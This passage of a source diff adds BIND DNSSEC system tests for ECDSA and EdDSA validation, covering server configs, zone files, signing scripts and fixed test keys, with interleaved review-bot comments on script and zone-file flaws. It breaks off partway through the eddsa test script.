+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/ecdsa/ns1/root.db.in b/bin/tests/system/ecdsa/ns1/root.db.in
new file mode 100644
index 0000000..3bff1d1
--- /dev/null
+++ b/bin/tests/system/ecdsa/ns1/root.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA fdupont.isc.org. a.root.servers.nil. (
+ 2012040600 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
diff --git a/bin/tests/system/ecdsa/ns1/sign.sh b/bin/tests/system/ecdsa/ns1/sign.sh
new file mode 100644
index 0000000..8c829bb
--- /dev/null
+++ b/bin/tests/system/ecdsa/ns1/sign.sh
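Review bot: In bin/tests/system/ecdsa/ns1/root.db.in the SOA record names `a.root.servers.nil.` (dots throughout) while the NS and A records use `a.root-servers.nil.` (with a hyphen), and the SOA's first field, where the primary server name belongs, holds `fdupont.isc.org.`; it looks as if MNAME and RNAME are swapped and the server name is misspelled. The test most likely does not depend on either field, but `. IN SOA a.root-servers.nil. fdupont.isc.org. (` would agree with the rest of the zone.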
@@ -0,0 +1,56 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +echo_i "ns1/sign.sh" + +cp $infile $zonefile + +if [ -f ../ecdsa256-supported.file ]; then + zsk256=$($KEYGEN -q -a ECDSA256 -n zone "$zone") + ksk256=$($KEYGEN -q -a ECDSA256 -n zone -f KSK "$zone") + cat "$ksk256.key" "$zsk256.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk256.key" >> dsset-256 +fi + +if [ -f ../ecdsa384-supported.file ]; then + zsk384=$($KEYGEN -q -a ECDSA384 -n zone "$zone") + ksk384=$($KEYGEN -q -a ECDSA384 -n zone -f KSK "$zone") + cat "$ksk384.key" "$zsk384.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk384.key" >> dsset-256 +fi + +# Configure the resolving server with a static key. +if [ -f ../ecdsa256-supported.file ]; then + keyfile_to_static_ds $ksk256 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +else + keyfile_to_static_ds $ksk384 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +fi + +if [ -f ../ecdsa384-supported.file ]; then + keyfile_to_static_ds $ksk384 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +else + keyfile_to_static_ds $ksk256 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +fi + +$SIGNER -P -g -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/ecdsa/ns2/named.conf.in b/bin/tests/system/ecdsa/ns2/named.conf.in new file mode 100644 index 0000000..fd125d3 --- /dev/null +++ b/bin/tests/system/ecdsa/ns2/named.conf.in 
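Review bot: A signing failure is hidden by the last line of ecdsa/ns1/sign.sh, `$SIGNER -P -g -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err`: the command on the left of `||` is exempt from `-e` and `cat` returns 0, so the script exits successfully even when no `root.db.signed` was produced. If a failed signer is meant to stop setup, print the log and keep the status, for example `... 2> signer.err || { cat signer.err; exit 1; }`. The same closing line is in eddsa/ns1/sign.sh, eddsa/ns2/sign.sh and eddsa/ns3/sign.sh. The `else` branches also expand `$ksk384` or `$ksk256` unquoted even when that key was never generated, so `keyfile_to_static_ds` is then called with no argument at all.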
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/ecdsa/ns3/named.conf.in b/bin/tests/system/ecdsa/ns3/named.conf.in
new file mode 100644
index 0000000..f1a80b6
--- /dev/null
+++ b/bin/tests/system/ecdsa/ns3/named.conf.in
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "trusted.conf";
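Review bot: The label comment in ecdsa/ns3/named.conf.in still reads `// NS2` although every address in the file is 10.53.0.3; it should be `// NS3`. eddsa/ns3/named.conf.in carries the same copied comment. The label is worth getting right because ns1/sign.sh writes separate trusted.conf files for ns2 and ns3, so someone chasing a validation failure uses it to tell the two resolvers apart.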
diff --git a/bin/tests/system/ecdsa/setup.sh b/bin/tests/system/ecdsa/setup.sh
new file mode 100644
index 0000000..a0eba63
--- /dev/null
+++ b/bin/tests/system/ecdsa/setup.sh
@@ -0,0 +1,33 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+set -e
+
+if $SHELL ../testcrypto.sh ecdsap256sha256; then
+ echo "yes" > ecdsa256-supported.file
+fi
+
+if $SHELL ../testcrypto.sh ecdsap384sha384; then
+ echo "yes" > ecdsa384-supported.file
+fi
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+(
+ cd ns1
+ $SHELL sign.sh
+)
diff --git a/bin/tests/system/ecdsa/tests.sh b/bin/tests/system/ecdsa/tests.sh
new file mode 100644
index 0000000..7f3bfcf
--- /dev/null
+++ b/bin/tests/system/ecdsa/tests.sh
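Review bot: `$SHELL sign.sh` in ecdsa/setup.sh starts a new shell that reads sign.sh as an ordinary script, so the `-e` on its `#!/bin/sh -e` line is never applied, and the `set -e` in this file does not carry into that child process. Unless conf.sh turns the option on itself (not visible here), a failing `$KEYGEN` or `$DSFROMKEY` in ns1/sign.sh does not stop the run and the later steps work from an empty key name. Invoking it as `$SHELL -e sign.sh`, or adding `set -e` after the conf.sh include inside sign.sh, closes the gap. eddsa/setup.sh runs three sign.sh scripts the same way and, unlike this file, has no `set -e` of its own.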
@@ -0,0 +1,53 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +dig_with_opts() { + "$DIG" +tcp +noau +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +if [ -f ecdsa256-supported.file ]; then + n=$((n+1)) + echo_i "checking that ECDSA256 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.2 soa > dig.out.ns2.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns2.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm ECDSA256 not supported, skipping test" +fi + +if [ -f ecdsa384-supported.file ]; then + n=$((n+1)) + echo_i "checking that ECDSA384 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.3 soa > dig.out.ns3.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns3.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm ECDSA384 not supported, skipping test" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/eddsa/clean.sh b/bin/tests/system/eddsa/clean.sh new file mode 100644 index 0000000..48c4d81 --- /dev/null +++ b/bin/tests/system/eddsa/clean.sh 
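Review bot: When neither `ecdsa256-supported.file` nor `ecdsa384-supported.file` exists, both branches of ecdsa/tests.sh only print a skip message and the script ends with status 0, so a build without ECDSA support is reported as a pass although no check ran. The eddsa test in this same commit ships a prereq.sh for that case, while the ecdsa directory in this diff has none; an ecdsa/prereq.sh modelled on it, probing `ecdsap256sha256` and `ecdsap384sha384` through `../testcrypto.sh`, would make the skip explicit. Both checks are also positive-only: nothing here asserts that an answer with a broken or missing signature comes back without the `ad` flag.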
@@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */K* */dsset-* */*.signed +rm -f dig.out* +rm -f ns*/root.db +rm -f ns*/signer.err +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns*/trusted.conf +rm -f ns*/example.com.db +rm -f ns*/named.conf +rm -f *-supported.file diff --git a/bin/tests/system/eddsa/ns1/named.conf.in b/bin/tests/system/eddsa/ns1/named.conf.in new file mode 100644 index 0000000..da27c58 --- /dev/null +++ b/bin/tests/system/eddsa/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/eddsa/ns1/root.db.in b/bin/tests/system/eddsa/ns1/root.db.in new file mode 100644 index 0000000..3bff1d1 --- /dev/null +++ b/bin/tests/system/eddsa/ns1/root.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA fdupont.isc.org. a.root.servers.nil. ( + 2012040600 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/eddsa/ns1/sign.sh b/bin/tests/system/eddsa/ns1/sign.sh new file mode 100644 index 0000000..148e475 --- /dev/null +++ b/bin/tests/system/eddsa/ns1/sign.sh 
@@ -0,0 +1,56 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +echo_i "ns1/sign.sh" + +cp $infile $zonefile + +if [ -f ../ed25519-supported.file ]; then + zsk25519=$($KEYGEN -q -a ED25519 -n zone "$zone") + ksk25519=$($KEYGEN -q -a ED25519 -n zone -f KSK "$zone") + cat "$ksk25519.key" "$zsk25519.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk25519.key" >> dsset-256 +fi + +if [ -f ../ed448-supported.file ]; then + zsk448=$($KEYGEN -q -a ED448 -n zone "$zone") + ksk448=$($KEYGEN -q -a ED448 -n zone -f KSK "$zone") + cat "$ksk448.key" "$zsk448.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk448.key" >> dsset-256 +fi + +# Configure the resolving server with a static key. +if [ -f ../ed25519-supported.file ]; then + keyfile_to_static_ds $ksk25519 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +else + keyfile_to_static_ds $ksk448 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +fi + +if [ -f ../ed448-supported.file ]; then + keyfile_to_static_ds $ksk448 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +else + keyfile_to_static_ds $ksk25519 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +fi + +$SIGNER -P -g -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.key b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.key new file mode 100644 index 0000000..ff6d5bf --- /dev/null +++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.key 
@@ -0,0 +1 @@
+example.com. IN DNSKEY 257 3 15 l02Woi0iS8Aa25FQkUd9RMzZHJpBoRQwAQEX1SxZJA4=
diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.private b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.private
new file mode 100644
index 0000000..788b2d7
--- /dev/null
+++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.private
@@ -0,0 +1,4 @@
+Private-key-format: v1.2
+Algorithm: 15 (ED25519)
+PrivateKey: ODIyNjAzODQ2MjgwODAxMjI2NDUxOTAyMDQxNDIyNjI=
+
diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.key b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.key
new file mode 100644
index 0000000..71e4620
--- /dev/null
+++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.key
@@ -0,0 +1 @@
+example.com. IN DNSKEY 257 3 15 zPnZ/QwEe7S8C5SPz2OfS5RR40ATk2/rYnE9xHIEijs=
diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.private b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.private
new file mode 100644
index 0000000..78ec36d
--- /dev/null
+++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.private
@@ -0,0 +1,3 @@
+Private-key-format: v1.2
+Algorithm: 15 (ED25519)
+PrivateKey: DSSF3o0s0f+ElWzj9E/Osxw8hLpk55chkmx0LYN5WiY=
diff --git a/bin/tests/system/eddsa/ns2/example.com.db.in b/bin/tests/system/eddsa/ns2/example.com.db.in
new file mode 100644
index 0000000..0ecda67
--- /dev/null
+++ b/bin/tests/system/eddsa/ns2/example.com.db.in
@@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA fdupont.isc.org. ns.example.com. ( + 2012040600 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 3600 ; minimum + ) + MX 10 mail.example.com. + NS ns.example.com. +ns.example.com. A 10.53.0.2 diff --git a/bin/tests/system/eddsa/ns2/named.conf.in b/bin/tests/system/eddsa/ns2/named.conf.in new file mode 100644 index 0000000..fd125d3 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/eddsa/ns2/sign.sh b/bin/tests/system/eddsa/ns2/sign.sh new file mode 100644 index 0000000..09bfb93 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/sign.sh 
@@ -0,0 +1,37 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example.com. +infile=example.com.db.in +zonefile=example.com.db +starttime=20150729220000 +endtime=20150819220000 + +echo_i "ns2/sign.sh" + +cp $infile $zonefile + +if [ -f ../ed25519-supported.file ]; then + + for i in Xexample.com.+015+03613 Xexample.com.+015+35217 + do + cp "$i.key" "$(echo $i.key | sed s/X/K/)" + cp "$i.private" "$(echo $i.private | sed s/X/K/)" + cat "$(echo $i.key | sed s/X/K/)" >> "$zonefile" + done +fi + +$SIGNER -P -z -s $starttime -e $endtime -o $zone $zonefile > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.key b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.key new file mode 100644 index 0000000..5c4628f --- /dev/null +++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.key @@ -0,0 +1 @@ +example.com. IN DNSKEY 257 3 16 3kgROaDjrh0H2iuixWBrc8g2EpBBLCdGzHmn+G2MpTPhpj/OiBVHHSfPodx1FYYUcJKm1MDpJtIA diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.private b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.private new file mode 100644 index 0000000..eb065f9 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+09713.private @@ -0,0 +1,3 @@ +Private-key-format: v1.2 +Algorithm: 16 (ED448) +PrivateKey: xZ+5Cgm463xugtkY5B0Jx6erFTXp13rYegst0qRtNsOYnaVpMx0Z/c5EiA9x8wWbDDct/U3FhYWA diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.key b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.key new file mode 100644 index 0000000..705856d 
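Review bot: Nothing in eddsa/ns2/sign.sh says why it installs fixed key pairs from the `Xexample.com.+015+*` files and signs with the hard-coded window `starttime=20150729220000` / `endtime=20150819220000`, while ns1/sign.sh generates fresh keys. tests.sh greps the signed zone for fixed signature fragments under the comment "RFC 8080 + errata", so presumably these are the published test-vector inputs; a comment above the loop such as `# Fixed keys and signing window reproduce the RFC 8080 test vectors; the X*.private files are published test material, not secrets.` would settle that for readers and for anyone triaging a secret-scanner hit on the committed `.private` files. eddsa/ns3/sign.sh needs the same comment. Separately, the last line leaves `$starttime`, `$endtime`, `$zone` and `$zonefile` unquoted where ns3/sign.sh quotes them.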
--- /dev/null
+++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.key
@@ -0,0 +1 @@
+example.com. IN DNSKEY 257 3 16 kkreGWoccSDmUBGAe7+zsbG6ZAFQp+syPmYUurBRQc3tDjeMCJcVMRDmgcNLp5HlHAMy12VoISsA
diff --git a/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.private b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.private
new file mode 100644
index 0000000..b512d80
--- /dev/null
+++ b/bin/tests/system/eddsa/ns3/Xexample.com.+016+38353.private
@@ -0,0 +1,3 @@
+Private-key-format: v1.2
+Algorithm: 16 (ED448)
+PrivateKey: WEykD3ht3MHkU8iH4uVOLz8JLwtRBSqiBoM6fF72+Mrp/u5gjxuB1DV6NnPO2BlZdz4hdSTkOdOA
diff --git a/bin/tests/system/eddsa/ns3/example.com.db.in b/bin/tests/system/eddsa/ns3/example.com.db.in
new file mode 100644
index 0000000..9a1aab6
--- /dev/null
+++ b/bin/tests/system/eddsa/ns3/example.com.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ IN SOA fdupont.isc.org. ns.example.com. (
+ 2012040600 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 3600 ; minimum
+ )
+ MX 10 mail.example.com.
+ NS ns.example.com.
+ns.example.com. A 10.53.0.3
diff --git a/bin/tests/system/eddsa/ns3/named.conf.in b/bin/tests/system/eddsa/ns3/named.conf.in
new file mode 100644
index 0000000..f1a80b6
--- /dev/null
+++ b/bin/tests/system/eddsa/ns3/named.conf.in
@@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/eddsa/ns3/sign.sh b/bin/tests/system/eddsa/ns3/sign.sh new file mode 100644 index 0000000..3cb8b45 --- /dev/null +++ b/bin/tests/system/eddsa/ns3/sign.sh 
@@ -0,0 +1,36 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example.com. +infile=example.com.db.in +zonefile=example.com.db +starttime=20150729220000 +endtime=20150819220000 + +echo_i "ns3/sign.sh" + +cp $infile $zonefile + +if [ -f ../ed448-supported.file ]; then + for i in Xexample.com.+016+09713 Xexample.com.+016+38353 + do + cp "$i.key" "$(echo $i.key | sed s/X/K/)" + cp "$i.private" "$(echo $i.private | sed s/X/K/)" + cat "$(echo $i.key | sed s/X/K/)" >> "$zonefile" + done +fi + +$SIGNER -P -z -s "$starttime" -e "$endtime" -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/eddsa/prereq.sh b/bin/tests/system/eddsa/prereq.sh new file mode 100644 index 0000000..a1a16ae --- /dev/null +++ b/bin/tests/system/eddsa/prereq.sh @@ -0,0 +1,25 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +supported=0 +if $SHELL ../testcrypto.sh ed25519; then + supported=1 +fi +if $SHELL ../testcrypto.sh ed448; then + supported=1 +fi + +[ "$supported" -eq 1 ] || exit 1 
diff --git a/bin/tests/system/eddsa/setup.sh b/bin/tests/system/eddsa/setup.sh new file mode 100644 index 0000000..4bac09a --- /dev/null +++ b/bin/tests/system/eddsa/setup.sh @@ -0,0 +1,40 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $SHELL ../testcrypto.sh ed25519; then + echo "yes" > ed25519-supported.file +fi + +if $SHELL ../testcrypto.sh ed448; then + echo "yes" > ed448-supported.file +fi + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +( + cd ns1 + $SHELL sign.sh +) +( + cd ns2 + $SHELL sign.sh +) +( + cd ns3 + $SHELL sign.sh +) diff --git a/bin/tests/system/eddsa/tests.sh b/bin/tests/system/eddsa/tests.sh new file mode 100644 index 0000000..705f5de --- /dev/null +++ b/bin/tests/system/eddsa/tests.sh 
@@ -0,0 +1,84 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +dig_with_opts() { + "$DIG" +tcp +noau +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +if [ -f ed25519-supported.file ]; then + # Check the example. domain + n=$((n+1)) + echo_i "checking that Ed25519 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.2 soa > dig.out.ns2.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns2.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then 